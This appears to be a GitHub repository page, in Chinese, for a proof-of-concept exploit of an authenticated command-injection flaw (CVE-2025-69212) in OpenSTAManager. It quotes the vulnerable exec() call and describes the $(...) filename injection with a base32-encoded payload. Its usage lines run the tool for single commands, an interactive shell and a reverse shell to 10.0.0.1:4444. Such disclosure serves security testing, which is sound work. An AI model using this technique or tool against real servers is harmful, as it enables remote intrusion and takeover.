jonathan-corbin/CVE-2025-69212-Authenticated-RCE-PoC

GitHub: jonathan-corbin/CVE-2025-69212-Authenticated-RCE-PoC

针对 OpenSTAManager <= 2.9.8 认证后 RCE 漏洞(CVE-2025-69212)的自动化利用 PoC,通过 .p7m 文件名命令注入实现远程代码执行。

Stars: 1 | Forks: 0

# CVE-2025-69212 — OpenSTAManager 认证后 RCE OpenSTAManager `<= 2.9.8` 中存在的认证后 OS 命令注入。 `src/Util/XML.php::decodeP7M()` 会使用上传的 `.p7m` 发票路径并在双引号中执行 `openssl`: ``` exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"'); ``` 文件名是攻击者可控的,且即使加上了引号,`$( )` 依然会被解析,因此像 `x$(...).p7m` 这样的文件名会以 web 用户的身份被执行。由于文件名中不能包含 `/`,因此 payload 使用 base32 编码,并在运行时进行解码。 ## 用法 ``` ./exploit.py -u http://target -l USER -p PASS -c 'id' # single command ./exploit.py -u http://target -l USER -p PASS -i # interactive ./exploit.py -u http://target -l USER -p PASS -s 10.0.0.1 -P 4444 # reverse shell ``` `--id-module`/`--id-plugin` 默认为 `14`/`19`(单文件导入器);如果你的安装配置有所不同,请自行覆盖这些参数。`-c`/`-i` 会将输出暂存在 `--webroot` 中(默认为 `/var/www/html/openstamanager`)。 ## 参考 - 安全公告:[GHSA-25fp-8w8p-mx36](https://github.com/advisories/GHSA-25fp-8w8p-mx36) · [NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-69212) - 先前 PoC:[lukasz-rybak/CVE-2025-69212](https://github.com/lukasz-rybak/CVE-2025-69212)(ZIP 向量) ## 致谢 该漏洞由 Łukasz Rybak 发现并披露([GHSA-25fp-8w8p-mx36](https://github.com/advisories/GHSA-25fp-8w8p-mx36))。 本仓库是一个独立的 PoC(使用单文件导入器,无需 ZIP)。仅供授权测试使用。
标签:CISA项目, PoC, RCE, 命令注入, 安全测试工具, 暴力破解, 逆向工具